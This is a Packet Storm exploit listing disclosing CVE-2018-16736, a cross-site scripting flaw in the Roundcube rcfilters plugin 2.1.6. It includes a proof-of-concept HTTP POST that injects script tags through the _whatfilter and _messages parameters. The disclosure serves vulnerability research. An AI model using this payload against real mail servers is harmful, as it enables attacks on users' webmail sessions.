Lucene search
Fahimeh RezaeiPACKETSTORM:149430HistorySep 19, 2018 - 12:00 a.m.
Roundcube rcfilters 2.1.6 Cross Site Scripting
2018-09-1900:00:00
Fahimeh Rezaei
packetstormsecurity.com
19
EPSS
0.001
Percentile
42.2%
`# Exploit Title: Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting
# Date: 2018-09-09
# Exploit Author: Fahimeh Rezaei
# Vendor Homepage: https://plugins.roundcube.net/packages/eagle00789/rcfilters
# Software Link: https://plugins.roundcube.net/packages/eagle00789/rcfilters
# Version: rcfilters plugin v2.1.6
# Tested on: Roundcube version 1.0.5
# CVE : CVE-2018-16736
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16736
# https://nvd.nist.gov/vuln/detail/CVE-2018-16736
# https://github.com/eagle00789/RC_Filters/issues/19
# Details:
# In the rcfilters plugin 2.1.6 for Roundcube, XSS exists via the
# _whatfilter and _messages parameters (in the Filters section of the settings).
# PoC
POST /rc/?_task=settings&_action=plugin.filters-save HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Referer: https://Target/rc/?_action=plugin.filters&_task=settings
Cookie: roundcube_sessid=; roundcube_sessauth=
Connection: close
Upgrade-Insecure-Requests: 1
_token=09bcde247d252364ea55c217c7654a1f&_whatfilter=from]<script>alert('XSS-1')</script>&_searchstring=whatever&_casesensitive=1&_folders=INBOX&_messages=all])<script>alert('XSS-2')</script>
`
Related
exploitpack
exploitpack
Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting
2018-09-19 00:00:00
osv
osv
CVE-2018-16736
2018-09-09 12:29:00
cvelist
cvelist
CVE-2018-16736
2018-09-09 12:00:00
zdt
zdt
Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting Vulnerability
2018-09-19 00:00:00
prion
prion
Cross site scripting
2018-09-09 12:29:00
exploitdb
exploitdb
Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting
2018-09-19 00:00:00
nvd
nvd
CVE-2018-16736
2018-09-09 12:29:00
cve
cve
CVE-2018-16736
2018-09-09 12:29:00